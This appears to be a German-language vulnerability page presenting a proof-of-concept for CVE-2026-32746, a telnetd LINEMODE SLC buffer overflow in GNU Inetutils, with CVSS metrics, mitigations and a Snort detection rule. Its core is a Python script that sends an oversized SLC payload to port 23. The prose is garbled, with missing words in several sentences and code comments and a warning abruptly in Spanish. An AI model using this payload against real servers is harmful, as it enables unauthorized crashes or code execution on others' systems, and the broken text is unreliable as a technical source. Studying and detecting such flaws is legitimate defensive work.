
Proof-of-Concept-Exploit für CVE-2026-32746, eine kritische Remote-Codeausführung-Schwachstelle in GNU Inetutils telnetd über einen LINEMODE-SLC-Pufferüberlauf. Enthält technische Analyse, CVSS-Metriken und Hinweise zur Schadensbegrenzung.
Kritische Schwachstelle | CVSS 9.8 | Remote Code Execution!
Betrifft: GNU Inetutils Telnetd (Versionen vor 2.7)
Typ: OOB Write im Handler für die LINEMODE SLC-Suboptionen
Angriffsvektor: Netzwerk (Port 23) | Keine Authentifizierung erforderlich
Auswirkung: RCE mit den Rechten des Telnetd-Prozesses
In der Funktion add_slc des telnetd-Daemons von wurde ein identifiziert. Dieser Fehler ermöglicht es einem entfernten Angreifer, , indem er die des Telnet-Protokolls manipuliert.
add_slc (Verarbeitung lokaler Zeichen).Ein Angreifer kann diese Schwachstelle mithilfe eines bösartigen Telnet-Payloads ausnutzen, das den internen Puffer überflutet:
#!/usr/bin/env python3
import socket
import sys
# CVE-2026-32746 - LINEMODE SLC Overflow
# IAC SB LINEMODE SLC <list> IAC SE
IAC = b'\xff'
SB = b'\xfa'
SE = b'\xf0'
LINEMODE = b'\x22'
SLC = b'\x03'
target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
# Payload generado para desbordar add_slc
malicious_slc = b"\x01\x03\x41" * 600 # Repetición de 600 veces
payload = IAC + SB + LINEMODE + SLC + malicious_slc + IAC + SE
print(f"[*] Enviando payload malicioso a {target}...")
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((target, 23))
s.sendall(payload)
print("[+] Payload entregado. Verificando caída del servicio/RCE...")
⚠️ ¡ADVERTENCIA! Este código es solo para fines educativos y de investigación. Su uso en sistemas sin autorización es ilegal.
| Metrik | Wert | Beschreibung |
|---|---|---|
| Vektor | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | Remote, ohne Authentifizierung |
| Bewertung | 9.8 (KRITISCH) 🔴 | Hohe Auswirkung auf Vertraulichkeit, Integrität und Verfügbarkeit |
| Veröffentlichung | 13. März 2026 | Letzte Änderung: 5. Mai 2026 |
✅ GNU Inetutils aktualisieren auf die gepatchte Version (post-2.7).
🔹 telnetd deaktivieren und auf SSH migrieren (empfohlen).
🔹 Port 23 in Perimeter-Firewalls blockieren.
🔹 IDS/IPS konfigurieren, um anomale LINEMODE SLC-Sequenzen zu erkennen.
alert tcp any any -> any 23 (msg:"CVE-2026-32746 - LINEMODE SLC Overflow"; content:"|FF FA 22 03|"; depth:5; threshold:type both, track by_src, count 1, seconds 1; sid:1000001; rev:1;)